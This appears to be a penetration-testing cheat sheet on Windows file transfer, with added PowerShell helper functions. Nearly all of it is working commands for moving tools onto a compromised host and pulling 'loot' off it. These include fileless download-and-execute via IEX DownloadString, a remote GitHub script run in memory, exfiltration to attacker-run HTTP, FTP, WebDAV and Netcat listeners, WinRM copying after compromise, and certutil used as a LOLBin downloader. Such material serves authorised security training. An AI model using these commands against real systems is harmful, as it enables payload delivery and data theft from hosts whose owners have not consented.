Windows - File Transfer

Moving files to or from a Windows host comes up constantly during an engagement: tools in, loot out. The methods below cover the usual channels (PowerShell web requests, SMB, FTP, WebDAV, WinRM, RDP and built-in binaries). Having several options matters because egress filtering, proxies or AV will often block the first one you try:

Download to PowerShell

  • Using base64 encoding

#On our machine
md5sum $file    #Record the hash of the file before sending it
cat $file | base64 -w0 #Encode the content and print it as a single line (-w0 disables wrapping)

#On the target machine
PS\> [IO.File]::WriteAllBytes("C:\Users\Public\$file", [Convert]::FromBase64String("$b64String"))
PS\> Get-FileHash C:\Users\Public\$file -Algorithm md5 #Compare with the md5sum above to confirm integrity

  • From a web to the target system

PS\> (New-Object Net.WebClient).DownloadFile('$fileURL','$outFile')
PS\> Invoke-WebRequest $fileURL -OutFile $outFile #Alternative, a little slower

#If the default PowerShell User-Agent is blocked by a proxy or WAF, impersonate a browser
PS\> Invoke-WebRequest $fileURL -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "$outFile"

The URL can point at any HTTP server under our control, for example a simple web server started in the directory holding the files on our machine.

  • Download and execute it directly in memory (fileless)

PS\> IEX (New-Object Net.WebClient).DownloadString('$fileURL')
PS\> (New-Object Net.WebClient).DownloadString('$fileURL') | IEX #Alternative

  • Bypassing parsing errors

PS\> Invoke-WebRequest https://$URL/$file | IEX #Can fail on Windows PowerShell 5.1: the response is parsed with the Internet Explorer engine, which errors if IE's first-launch setup has not run
PS\> Invoke-WebRequest https://$URL/$file -UseBasicParsing | IEX #-UseBasicParsing skips the IE DOM parsing and solves it
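As an added example (not code from the original page), the helper below folds the download tricks above into one function: it forces TLS 1.2 (older .NET defaults negotiate TLS 1.0 and fail against modern servers), sets a browser User-Agent on both the WebClient path and the Invoke-WebRequest fallback, passes -UseBasicParsing on the fallback, and, when no -OutFile is given, returns the content as a string for fileless `| IEX` use. `$Url`, `$OutFile` and the host address in the usage comment are placeholders.

```powershell
# Added example, not from the original page. $Url/$OutFile are placeholders.
function Get-WebFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string]$OutFile,   # omit to get the content back as a string (fileless, pipe to IEX)
        [string]$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
    )
    # Old .NET defaults to SSL3/TLS1.0; force TLS 1.2 so the request is not refused
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    if ($OutFile) {
        # WebClient resolves relative paths against the process cwd, not the PowerShell location
        $OutFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutFile)
    }
    $wc = New-Object Net.WebClient
    $wc.Headers.Add('User-Agent', $UserAgent)
    try {
        if ($OutFile) {
            $wc.DownloadFile($Url, $OutFile)
            return Get-Item -LiteralPath $OutFile
        }
        return $wc.DownloadString($Url)
    } catch {
        Write-Warning "WebClient failed ($($_.Exception.Message)); falling back to Invoke-WebRequest"
        # -UseBasicParsing avoids the IE engine dependency on Windows PowerShell 5.1
        if ($OutFile) {
            Invoke-WebRequest -Uri $Url -OutFile $OutFile -UserAgent $UserAgent -UseBasicParsing
            return Get-Item -LiteralPath $OutFile
        }
        return (Invoke-WebRequest -Uri $Url -UserAgent $UserAgent -UseBasicParsing).Content
    }
}

# Usage (placeholder address):
#   Get-WebFile -Url http://10.10.14.5:8000/tool.exe -OutFile C:\Users\Public\tool.exe
#   Get-WebFile -Url http://10.10.14.5:8000/script.ps1 | IEX
```

Note that the fileless path still goes through AMSI when the string is handed to IEX; it avoids disk, not script scanning.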

Download using SMB

  • Start an SMB server on our machine to share files and copy them from the target machine

#On our machine
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

#On the target machine (outbound SMB on TCP 445 is usually blocked at the perimeter, so this mostly works on internal networks)
PS\> net use n: \\$IP\share /user:test test
PS\> Copy-Item n:\$file C:\Users\Public\$file

Download using FTP

  • Start an FTP server on our machine to share files and download them from the target machine

#On our machine
sudo pip install pyftpdlib #Install the FTP server module
sudo python -m pyftpdlib --port 21 #Start the server (anonymous and read-only by default)

#On the target machine
PS\> (New-Object Net.WebClient).DownloadFile('ftp://$IP/$file', 'C:\Users\Public\$file')

  • Without an interactive shell, ftp.exe can be driven from a command script

PS\> echo open $IP > ftpcommand.txt
PS\> echo USER anonymous >> ftpcommand.txt
PS\> echo binary >> ftpcommand.txt
PS\> echo GET $file >> ftpcommand.txt
PS\> echo bye >> ftpcommand.txt
PS\> ftp -v -n -s:ftpcommand.txt #-n disables auto-login, -s: reads the commands from the file

PS\> type $file #Confirm the file has been transferred

Upload from PowerShell

  • Using base64 encoding

# On the target machine
PS\> Get-FileHash $pathToFile -Algorithm md5 #Record the hash of the file
PS\> [Convert]::ToBase64String((Get-Content -path "$pathToFile" -Encoding byte)) #On PowerShell 7+ replace -Encoding byte with -AsByteStream

#On our machine
echo $b64String | base64 -d > $file
md5sum $file #Check hash to confirm the integrity of the file
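The two base64 procedures on this page (download into PowerShell and upload out of it) share the same two concerns: reading bytes in a way that works on both Windows PowerShell 5.1 and PowerShell 7, and verifying the hash on the receiving end. The pair of functions below is an added example, not code from the original page, that does both; the sending side's hash is computed with Get-FileHash on Windows or `sha256sum`/`md5sum` on our machine, and is then passed in as `-ExpectedHash`. Paths and hashes in the usage comments are placeholders.

```powershell
# Added example, not from the original page. Paths/hashes in comments are placeholders.

function ConvertTo-B64Payload {
    # Target -> attacker: print the hash for the far side, return the file as one base64 line
    param([Parameter(Mandatory)][string]$Path, [string]$Algorithm = 'SHA256')
    $full = (Resolve-Path -LiteralPath $Path).ProviderPath
    # ReadAllBytes sidesteps the Get-Content -Encoding Byte (5.1) vs -AsByteStream (7+) difference
    $bytes = [IO.File]::ReadAllBytes($full)
    $hash  = (Get-FileHash -LiteralPath $full -Algorithm $Algorithm).Hash
    Write-Host "[*] $Algorithm of ${full}: $hash ($($bytes.Length) bytes)"
    [Convert]::ToBase64String($bytes)
}

function ConvertFrom-B64Payload {
    # Attacker -> target: decode, write, and refuse to keep a file whose hash does not match
    param(
        [Parameter(Mandatory)][string]$B64,
        [Parameter(Mandatory)][string]$OutFile,
        [Parameter(Mandatory)][string]$ExpectedHash,
        [string]$Algorithm = 'SHA256'
    )
    # A terminal paste may have wrapped or padded the blob; strip all whitespace first
    $clean = $B64 -replace '\s', ''
    $full  = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutFile)
    [IO.File]::WriteAllBytes($full, [Convert]::FromBase64String($clean))
    $actual = (Get-FileHash -LiteralPath $full -Algorithm $Algorithm).Hash
    if ($actual -ne $ExpectedHash) {          # -ne on strings is case-insensitive, so hex case does not matter
        Remove-Item -LiteralPath $full -Force
        throw "Hash mismatch for ${full}: got $actual, expected $ExpectedHash (file removed)"
    }
    Get-Item -LiteralPath $full
}

# Usage:
#   $blob = ConvertTo-B64Payload -Path C:\Users\Public\loot.db      # paste $blob into 'base64 -d' on our machine
#   ConvertFrom-B64Payload -B64 $blob -OutFile C:\Users\Public\tool.exe -ExpectedHash '<sha256 from sha256sum>'
```

Very large blobs are awkward to paste through a reverse shell; split them into chunks and concatenate on the far side, then verify once with the same hash check.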

  • From the target system to a web server (HTTP upload)

#On our machine
pip3 install uploadserver
python3 -m uploadserver

#On the target system (the helper script is pulled from GitHub, so the target needs Internet access; otherwise host a copy on our own server)
PS\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS\> Invoke-FileUpload -Uri http://$IP:$port/upload -File $pathToFile
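Pulling a third-party helper script from GitHub onto a target is not always possible (no Internet egress) or desirable (extra artefact, extra trust). As an added example that is not part of the original page or of the uploadserver project, the function below builds the multipart/form-data request by hand with Invoke-WebRequest, which exists on both Windows PowerShell 5.1 and PowerShell 7. It assumes the receiving endpoint reads the file from a form field named `files`, which is what `python3 -m uploadserver` accepts; the URL in the usage comment is a placeholder.

```powershell
# Added example, not from the original page. Field name 'files' and the URL are assumptions.
function Send-MultipartFile {
    param(
        [Parameter(Mandatory)][string]$Uri,       # e.g. http://10.10.14.5:8000/upload (placeholder)
        [Parameter(Mandatory)][string]$Path,
        [string]$FieldName = 'files'              # form field the server reads the upload from
    )
    $full  = (Resolve-Path -LiteralPath $Path).ProviderPath
    $bytes = [IO.File]::ReadAllBytes($full)
    $name  = [IO.Path]::GetFileName($full)
    $boundary = 'PSBoundary' + [Guid]::NewGuid().ToString('N')
    $crlf  = "`r`n"
    # Multipart framing: header part, raw file bytes, closing boundary
    $head  = "--$boundary$crlf" +
             "Content-Disposition: form-data; name=`"$FieldName`"; filename=`"$name`"$crlf" +
             "Content-Type: application/octet-stream$crlf$crlf"
    $tail  = "$crlf--$boundary--$crlf"
    $ascii = [Text.Encoding]::ASCII
    # Keep everything as bytes so binary content is not mangled by string conversion
    $body  = [byte[]]($ascii.GetBytes($head) + $bytes + $ascii.GetBytes($tail))
    $resp  = Invoke-WebRequest -Uri $Uri -Method Post -UseBasicParsing `
                 -ContentType "multipart/form-data; boundary=$boundary" -Body $body
    "[+] $name ($($bytes.Length) bytes) -> $Uri : HTTP $($resp.StatusCode)"
}

# Usage (placeholder address):  Send-MultipartFile -Uri http://10.10.14.5:8000/upload -Path C:\Users\Public\loot.zip
```

The array concatenation copies the file once in memory, which is fine for the sizes typically exfiltrated this way; for very large files prefer one of the stream-based channels (SMB, WebDAV, FTP) further down.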

  • Use base64 encoding to send a web request and catch it with Netcat

#On our machine
nc -nvlp $port

#On the target system
PS\> $b64 = [System.convert]::ToBase64String((Get-Content -Path '$pathToFile' -Encoding Byte)) #-AsByteStream on PowerShell 7+
PS\> Invoke-WebRequest -Uri http://$IP:$port/ -Method POST -Body $b64 #Netcat prints the raw request; decode the body with base64 -d on our machine

Upload using SMB / WebDAV

  • Outbound SMB (TCP 445) is commonly blocked, so expose a WebDAV share instead: Windows resolves the \\$IP\DavWWWRoot UNC path through its WebClient service over HTTP, and Copy-Item uploads to it like any other share

#On our machine
sudo pip install wsgidav
sudo pip install cheroot

sudo wsgidav --host=0.0.0.0 --port=$port --root=/tmp --auth=anonymous

#On the target machine (DavWWWRoot is a reserved name telling the WebClient service the host speaks WebDAV; port 80 is assumed unless written as \\$IP@$port\DavWWWRoot)
PS\> dir \\$IP\DavWWWRoot
PS\> Copy-Item $pathToFile \\$IP\DavWWWRoot\

Upload using FTP

  • Start an FTP server on our machine with write access and upload files from the target machine

#On our machine
sudo pip install pyftpdlib #Install ftp server module
sudo python -m pyftpdlib --port 21 --write

#On the target machine
PS\> (New-Object Net.WebClient).UploadFile('ftp://$IP/$fileName', '$pathToFile')

  • Without an interactive shell, ftp.exe can be driven from a command script

PS\> echo open $IP > ftpcommand.txt
PS\> echo USER anonymous >> ftpcommand.txt
PS\> echo binary >> ftpcommand.txt
PS\> echo PUT $file >> ftpcommand.txt
PS\> echo bye >> ftpcommand.txt
PS\> ftp -v -n -s:ftpcommand.txt
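The two ftp.exe scripts above (GET and PUT) differ in one line, so a single helper can generate either from a here-string, run ftp.exe non-interactively and remove the script afterwards. This is an added example, not code from the original page. It assumes a pyftpdlib server as started above, that accepts anonymous logins with any password (pass it inline on the `user` line so no separate password prompt is needed), and, for uploads, that was started with `--write`. Two caveats worth knowing: Windows ftp.exe only supports active mode, so the data connection is opened from our server back to the target and a host firewall there can block it; and the local directory defaults to C:\Users\Public because it is writable by any user.

```powershell
# Added example, not from the original page. $Ip/$File/$LocalDir are placeholders.
function Invoke-FtpScript {
    param(
        [Parameter(Mandatory)][string]$Ip,
        [Parameter(Mandatory)][string]$File,          # remote file name for GET, local file name for PUT
        [Parameter(Mandatory)][ValidateSet('GET','PUT')][string]$Direction,
        [string]$LocalDir = 'C:\Users\Public',        # GET writes here, PUT reads from here
        [string]$User = 'anonymous',
        [string]$Pass = 'anonymous@'                  # any password is accepted for anonymous (assumption)
    )
    $scriptPath = Join-Path $LocalDir 'ftpcommand.txt'
    # -n disables auto-login, so credentials come from the script; 'user name password' avoids the prompt.
    # The closing "@ must sit at the start of its line.
    $commands = @"
open $Ip
user $User $Pass
binary
lcd $LocalDir
$Direction $File
bye
"@
    Set-Content -LiteralPath $scriptPath -Value $commands -Encoding ASCII
    try {
        # -s: reads commands from the file; ftp.exe prints the transfer result (active mode only)
        & ftp.exe -v -n -s:$scriptPath
    } finally {
        Remove-Item -LiteralPath $scriptPath -Force -ErrorAction SilentlyContinue
    }
    if ($Direction -eq 'GET') {
        # Errors if the download never arrived
        Get-Item -LiteralPath (Join-Path $LocalDir $File)
    }
}

# Usage (placeholder address):
#   Invoke-FtpScript -Ip 10.10.14.5 -File tool.exe -Direction GET
#   Invoke-FtpScript -Ip 10.10.14.5 -File loot.zip -Direction PUT
```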

Transfer between Windows hosts using PowerShell remote session and WinRM

  • Once we have compromised a host and hold credentials of an Administrator, or of any user in the Remote Management Users group on the second host, files can be copied over a PowerShell remoting session (WinRM: TCP 5985 for HTTP, 5986 for HTTPS)

PS\> Test-NetConnection -ComputerName <target> -Port 5985 #Confirm WinRM is open
PS\> $Session = New-PSSession -ComputerName <target>
PS\> Copy-Item -Path <pathToFile> -ToSession $Session -Destination <destinationPath> #From our host to the target
PS\> Copy-Item -Path <pathToFile> -Destination <destinationPath> -FromSession $Session #From the target to our host
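The session steps above, wrapped into one function as an added example (not code from the original page): it checks the port first, opens the session with explicit credentials rather than the current token, copies the file, hashes it on the remote side inside the session so a truncated copy is caught, and always tears the session down. `$Target`, the paths and the credential prompt are placeholders for the operator's values.

```powershell
# Added example, not from the original page. $Target and paths are placeholders.
function Copy-ViaWinRM {
    param(
        [Parameter(Mandatory)][string]$Target,
        [Parameter(Mandatory)][string]$LocalPath,
        [Parameter(Mandatory)][string]$RemotePath,
        [pscredential]$Credential = (Get-Credential)   # Administrator or Remote Management Users member
    )
    # Quiet mode returns a plain boolean instead of the connection report
    if (-not (Test-NetConnection -ComputerName $Target -Port 5985 -InformationLevel Quiet)) {
        throw "WinRM (5985/tcp) not reachable on $Target"
    }
    $session = New-PSSession -ComputerName $Target -Credential $Credential
    try {
        Copy-Item -Path $LocalPath -Destination $RemotePath -ToSession $session
        $localHash  = (Get-FileHash -LiteralPath $LocalPath).Hash
        # Hash inside the session, on the remote filesystem, rather than trusting the copy
        $remoteHash = Invoke-Command -Session $session -ScriptBlock {
            param($p) (Get-FileHash -LiteralPath $p).Hash
        } -ArgumentList $RemotePath
        if ($remoteHash -ne $localHash) {
            throw "Hash mismatch: local $localHash, remote $remoteHash"
        }
        "[+] $LocalPath -> ${Target}:$RemotePath (SHA256 $remoteHash)"
    } finally {
        Remove-PSSession $session
    }
}

# Usage: Copy-ViaWinRM -Target DC01 -LocalPath C:\Users\Public\tool.exe -RemotePath C:\Windows\Temp\tool.exe
```

Swap the -ToSession/-FromSession direction and the hash order to pull files back instead; the session handling is identical.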

Upload using the RDP protocol

  • We can map a local directory into the RDP session as a shared drive and copy files in both directions

rdesktop $IP -d $domain -u $user -p '$password' -r disk:linux='$pathToDir' #Share the local directory $pathToDir under the name "linux"
#Alternative
xfreerdp /v:$IP /d:$domain /u:$user /p:'$password' /drive:linux,$pathToDir
cd \\tsclient\linux  #Inside the RDP session: access the mapped directory

Download using integrated Windows Binaries

  • Using bitsadmin

PS\> bitsadmin /transfer wcb /priority foreground $urlToFile $outFile #$outFile must be an absolute path
PS\> Import-Module bitstransfer; Start-BitsTransfer -Source "$urlToFile" -Destination "$outFile" #PowerShell equivalent of bitsadmin

  • Using certutil

PS\> certutil.exe -verifyctl -split -f $urlToFile #Writes the download into the current directory; a well-known LOLBin technique, so expect AV/EDR to flag it
